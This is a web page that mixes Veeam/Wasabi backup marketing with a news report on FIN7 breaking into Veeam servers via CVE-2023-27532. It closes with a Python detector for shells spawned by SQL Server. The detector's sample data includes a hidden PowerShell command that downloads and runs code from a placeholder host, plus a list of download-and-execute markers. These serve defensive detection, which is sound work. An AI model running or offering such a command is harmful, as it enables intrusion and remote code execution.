Veeam data backup
1/14/2024

With Veeam Backup and Replication v12 you can copy backups directly to the cloud, simplifying your backup jobs and making the move to the cloud even easier. Veeam Backup and Recovery can automatically schedule old on-premises backups to be moved to the cloud via a copy job. This set-and-forget feature ensures that your on-premises systems maintain maximum available capacity, which is critical for high-performance restore operations. Alternatively, you can set backups to be sent to local storage and the cloud simultaneously.

Backups with Object Lock for Ransomware Mitigation

With Veeam Backup and Replication and Wasabi S3 Object Lock, your backups cannot be deleted or altered (encrypted) without your permission. This dramatically simplifies off-site backup and compliance with the 3-2-1-1-0 rule. While on-premises systems may be susceptible to cyber attacks and malicious encryption, object-locked backups in the Wasabi cloud provide an air-gapped, immutable copy for guaranteed integrity when it comes time to recover that data. Veeam Direct to Cloud Object Storage (v12) allows Veeam users to back up their NAS systems directly to cloud object storage. Backing up files directly to cloud object storage reduces the complexity of managing backups and minimizes spend on new storage hardware. Employ enterprise efficiency with all the benefits of Wasabi hot cloud storage: price, scalability, security, and durability.

Researchers warn that a financially motivated cybercrime group known as FIN7 is compromising Veeam Backup & Replication servers and deploying malware on them. It’s not yet clear how attackers are breaking into the servers, but one possibility is that they’re taking advantage of a vulnerability patched in the popular enterprise data replication solution last month.

Researchers from cybersecurity firm WithSecure have investigated two such compromises so far, dating from late March, but they believe these are likely part of a larger campaign. The post-exploitation activity included setting up persistence, system and network reconnaissance, credential extraction and lateral movement.

Tools and techniques used consistent with past FIN7 activity

FIN7, or Carbon Spider, is a cybercrime group that has been in operation since at least 2013 and has been associated with the Carbanak malware family. The group was known in its early years for launching malware attacks against organizations from the retail, restaurant, and hospitality sectors with the goal of stealing credit card information. However, FIN7 also expanded into ransomware, being associated with the Darkside and BlackMatter ransomware families, and more recently BlackCat/ALPHV.

A forensic analysis of the compromised Veeam servers showed that the SQL Server process “sqlservr.exe” that belongs to the Veeam Backup instance was used to execute a batch shell script, which in turn downloaded and executed a PowerShell script directly in memory. That PowerShell script was POWERTRASH, an obfuscated malware loader that has been attributed to FIN7 in the past.

The attackers deliver both the legitimate gup.exe along with its configuration file and a maliciously modified library called libcurl.dll that gup.exe is designed to execute. This library then decodes the DICELOADER payload from another file and executes it.

The attackers were also seen executing Veeam-specific commands. For example, they used SQL commands to steal information from the Veeam backup database and a custom script to retrieve passwords from the server.

While the WithSecure researchers are not sure how the servers were compromised, they suspect that the attackers exploited a vulnerability tracked as CVE-2023-27532 that was patched by Veeam on March 7. The flaw allows an unauthenticated user who can connect to the server on TCP port 9401 to extract credentials stored in the server’s configuration database and potentially gain access to the server host system. “A proof-of-concept (POC) exploit was made publicly available a few days prior to the campaign, on 23rd March 2023,” the WithSecure researchers said.
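The execution chain from the forensic analysis above (the Veeam SQL Server process sqlservr.exe running a batch script that launched in-memory PowerShell) is a parent/child anomaly a defender can alert on. The following Python is an added detection example, not code from WithSecure or the original article; the process events, file paths and the placeholder URL are constructed.

```python
from dataclasses import dataclass

@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str     # full path of the executable
    cmdline: str

# Command interpreters a database engine has no business spawning.
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe"}
# Substrings typical of PowerShell that downloads and runs code in memory.
INMEM_MARKERS = ("downloadstring", "iex", "invoke-expression", "frombase64string", "-encodedcommand", "-enc ")

def basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def ancestry(event, by_pid, max_depth=8):
    """Walk parent links child-first; stops at unknown pids or max_depth."""
    chain = [event]
    while len(chain) < max_depth and chain[-1].ppid in by_pid:
        chain.append(by_pid[chain[-1].ppid])
    return chain

def detect(events):
    """Return (pid, reason) for every shell that descends from sqlservr.exe."""
    by_pid = {e.pid: e for e in events}
    alerts = []
    for e in events:
        if basename(e.image) not in SHELLS:
            continue
        names = [basename(p.image) for p in ancestry(e, by_pid)]
        if "sqlservr.exe" not in names[1:]:
            continue
        reason = "shell descended from sqlservr.exe: " + " <- ".join(names)
        if any(m in e.cmdline.lower() for m in INMEM_MARKERS):
            reason += " (in-memory download/execute markers)"
        alerts.append((e.pid, reason))
    return alerts

# Constructed sample telemetry, not real data; paths and URL are placeholders.
SAMPLE = [
    ProcEvent(1000, 600, r"C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlservr.exe", "sqlservr.exe"),
    ProcEvent(1010, 1000, r"C:\Windows\System32\cmd.exe", r"cmd.exe /c C:\Windows\Temp\stage.bat"),
    ProcEvent(1020, 1010, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -nop -w hidden -c \"IEX (New-Object Net.WebClient).DownloadString('http://placeholder.invalid/p')\""),
    ProcEvent(700, 600, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(2010, 700, r"C:\Windows\System32\cmd.exe", "cmd.exe /c dir"),  # benign admin shell
]
```

Running `detect(SAMPLE)` flags the cmd.exe child of sqlservr.exe and the PowerShell grandchild with download-and-execute markers, while the explorer-spawned shell stays silent.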